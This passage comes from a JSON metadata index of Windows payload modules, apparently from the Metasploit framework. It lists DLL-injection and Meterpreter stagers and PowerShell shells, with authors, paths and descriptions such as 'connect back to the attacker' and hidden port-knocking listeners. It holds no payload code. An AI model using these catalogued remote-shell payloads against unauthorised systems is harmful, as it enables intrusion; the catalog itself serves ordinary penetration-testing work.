"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/bind_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/patchupdllinject/bind_tcp_uuid": {
"name": "Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/patchupdllinject/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Inject a custom DLL into the exploited process. Listen for a connection with UUID Support (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/find_tag": {
"name": "Windows Inject DLL, Find Tag Ordinal Stager",
"full_name": "payload/windows/patchupdllinject/find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>"
],
"description": "Inject a custom DLL into the exploited process. Use an established connection",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/findtag_ord.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/reverse_ipv6_tcp": {
"name": "Windows Inject DLL, Reverse TCP Stager (IPv6)",
"full_name": "payload/windows/patchupdllinject/reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject a custom DLL into the exploited process. Connect back to the attacker over IPv6",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/reverse_nonx_tcp": {
"name": "Windows Inject DLL, Reverse TCP Stager (No NX or Win7)",
"full_name": "payload/windows/patchupdllinject/reverse_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"vlad902 <vlad902@gmail.com>"
],
"description": "Inject a custom DLL into the exploited process. Connect back to the attacker (No NX)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/reverse_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/reverse_ord_tcp": {
"name": "Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)",
"full_name": "payload/windows/patchupdllinject/reverse_ord_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"spoonm <spoonm@no$email.com>"
],
"description": "Inject a custom DLL into the exploited process. Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/reverse_ord_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/reverse_tcp": {
"name": "Windows Inject DLL, Reverse TCP Stager",
"full_name": "payload/windows/patchupdllinject/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject a custom DLL into the exploited process. Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/reverse_tcp_allports": {
"name": "Windows Inject DLL, Reverse All-Port TCP Stager",
"full_name": "payload/windows/patchupdllinject/reverse_tcp_allports",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject a custom DLL into the exploited process. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/reverse_tcp_allports",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/reverse_tcp_dns": {
"name": "Windows Inject DLL, Reverse TCP Stager (DNS)",
"full_name": "payload/windows/patchupdllinject/reverse_tcp_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"RageLtMan"
],
"description": "Inject a custom DLL into the exploited process. Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/reverse_tcp_dns",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/reverse_tcp_rc4": {
"name": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/patchupdllinject/reverse_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"mihi",
"RageLtMan"
],
"description": "Inject a custom DLL into the exploited process. Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/reverse_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/patchupdllinject/reverse_tcp_rc4_dns": {
"name": "Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)",
"full_name": "payload/windows/patchupdllinject/reverse_tcp_rc4_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"mihi",
"RageLtMan"
],
"description": "Inject a custom DLL into the exploited process. Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/reverse_tcp_rc4_dns",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/patchupdllinject/reverse_tcp_uuid": {
"name": "Windows Inject DLL, Reverse TCP Stager with UUID Support",
"full_name": "payload/windows/patchupdllinject/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Inject a custom DLL into the exploited process. Connect back to the attacker with UUID Support",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupdllinject/reverse_udp": {
"name": "Windows Inject DLL, Reverse UDP Stager with UUID Support",
"full_name": "payload/windows/patchupdllinject/reverse_udp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"jt <jt@klake.org>",
"skape <mmiller@hick.org>",
"RageLtMan <rageltman@sempervictus>"
],
"description": "Inject a custom DLL into the exploited process. Connect back to the attacker with UUID Support",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-13 14:34:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_udp.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/reverse_udp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/bind_hidden_ipknock_tcp": {
"name": "Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager",
"full_name": "payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject the meterpreter server DLL (staged). Listen for a connection. First, the port will need to be knocked from\n the IP defined in KHOST. This IP will work as an authentication method\n (you can spoof it with tools like hping). After that you could get your\n shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n hide the shellcode",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/bind_hidden_ipknock_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/bind_hidden_tcp": {
"name": "Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager",
"full_name": "payload/windows/patchupmeterpreter/bind_hidden_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"Borja Merino <bmerinofe@gmail.com>"
],
"description": "Inject the meterpreter server DLL (staged). Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/bind_hidden_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/bind_ipv6_tcp": {
"name": "Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)",
"full_name": "payload/windows/patchupmeterpreter/bind_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject the meterpreter server DLL (staged). Listen for an IPv6 connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/bind_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/bind_ipv6_tcp_uuid": {
"name": "Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL (staged). Listen for an IPv6 connection with UUID Support (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_ipv6_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/bind_ipv6_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/bind_named_pipe": {
"name": "Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager",
"full_name": "payload/windows/patchupmeterpreter/bind_named_pipe",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"UserExistsError"
],
"description": "Inject the meterpreter server DLL (staged). Listen for a pipe connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-27 19:24:51 +0000",
"path": "/modules/payloads/stagers/windows/bind_named_pipe.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/bind_named_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/bind_nonx_tcp": {
"name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)",
"full_name": "payload/windows/patchupmeterpreter/bind_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"vlad902 <vlad902@gmail.com>"
],
"description": "Inject the meterpreter server DLL (staged). Listen for a connection (No NX)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/bind_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/bind_tcp": {
"name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)",
"full_name": "payload/windows/patchupmeterpreter/bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject the meterpreter server DLL (staged). Listen for a connection (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/bind_tcp_rc4": {
"name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/patchupmeterpreter/bind_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"mihi",
"RageLtMan"
],
"description": "Inject the meterpreter server DLL (staged). Listen for a connection",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/bind_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/patchupmeterpreter/bind_tcp_uuid": {
"name": "Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)",
"full_name": "payload/windows/patchupmeterpreter/bind_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL (staged). Listen for a connection with UUID Support (Windows x86)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/bind_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/find_tag": {
"name": "Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager",
"full_name": "payload/windows/patchupmeterpreter/find_tag",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>"
],
"description": "Inject the meterpreter server DLL (staged). Use an established connection",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/findtag_ord.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/find_tag",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/reverse_ipv6_tcp": {
"name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)",
"full_name": "payload/windows/patchupmeterpreter/reverse_ipv6_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject the meterpreter server DLL (staged). Connect back to the attacker over IPv6",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/reverse_ipv6_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/reverse_nonx_tcp": {
"name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)",
"full_name": "payload/windows/patchupmeterpreter/reverse_nonx_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"vlad902 <vlad902@gmail.com>"
],
"description": "Inject the meterpreter server DLL (staged). Connect back to the attacker (No NX)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/reverse_nonx_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/reverse_ord_tcp": {
"name": "Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)",
"full_name": "payload/windows/patchupmeterpreter/reverse_ord_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"spoonm <spoonm@no$email.com>"
],
"description": "Inject the meterpreter server DLL (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/reverse_ord_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/reverse_tcp": {
"name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager",
"full_name": "payload/windows/patchupmeterpreter/reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject the meterpreter server DLL (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/reverse_tcp_allports": {
"name": "Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager",
"full_name": "payload/windows/patchupmeterpreter/reverse_tcp_allports",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Inject the meterpreter server DLL (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/reverse_tcp_allports",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/reverse_tcp_dns": {
"name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)",
"full_name": "payload/windows/patchupmeterpreter/reverse_tcp_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"RageLtMan"
],
"description": "Inject the meterpreter server DLL (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/reverse_tcp_dns",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/reverse_tcp_rc4": {
"name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
"full_name": "payload/windows/patchupmeterpreter/reverse_tcp_rc4",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"mihi",
"RageLtMan"
],
"description": "Inject the meterpreter server DLL (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/reverse_tcp_rc4",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/patchupmeterpreter/reverse_tcp_rc4_dns": {
"name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)",
"full_name": "payload/windows/patchupmeterpreter/reverse_tcp_rc4_dns",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"sf <stephen_fewer@harmonysecurity.com>",
"mihi",
"RageLtMan"
],
"description": "Inject the meterpreter server DLL (staged). Connect back to the attacker",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/reverse_tcp_rc4_dns",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"payload_windows/patchupmeterpreter/reverse_tcp_uuid": {
"name": "Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support",
"full_name": "payload/windows/patchupmeterpreter/reverse_tcp_uuid",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"hdm <x@hdm.io>",
"OJ Reeves"
],
"description": "Inject the meterpreter server DLL (staged). Connect back to the attacker with UUID Support",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-15 15:10:26 +0000",
"path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/reverse_tcp_uuid",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/patchupmeterpreter/reverse_udp": {
"name": "Windows Meterpreter (skape/jt Injection), Reverse UDP Stager with UUID Support",
"full_name": "payload/windows/patchupmeterpreter/reverse_udp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"skape <mmiller@hick.org>",
"jt <jt@klake.org>",
"RageLtMan <rageltman@sempervictus>"
],
"description": "Inject the meterpreter server DLL (staged). Connect back to the attacker with UUID Support",
"references": [
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2018-02-13 14:34:21 +0000",
"path": "/modules/payloads/stagers/windows/reverse_udp.rb",
"is_install_path": true,
"ref_name": "windows/patchupmeterpreter/reverse_udp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/powershell_bind_tcp": {
"name": "Windows Interactive Powershell Session, Bind TCP",
"full_name": "payload/windows/powershell_bind_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ben Turner",
"Dave Hardy",
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Listen for a connection and spawn an interactive powershell session",
"references": [
"URL-https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-26 08:40:07 +0000",
"path": "/modules/payloads/singles/windows/powershell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "windows/powershell_bind_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"payload_windows/powershell_reverse_tcp": {
"name": "Windows Interactive Powershell Session, Reverse TCP",
"full_name": "payload/windows/powershell_reverse_tcp",
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Ben Turner",
"Dave Hardy",
"vlad902 <vlad902@gmail.com>",
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "Listen for a connection and spawn an interactive powershell session",
"references": [
"URL-https://www.nettitude.co.uk/interactive-powershell-session-via-metasploit/"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2019-04-26 08:40:07 +0000",
"path": "/modules/payloads/singles/windows/powershell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "windows/powershell_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
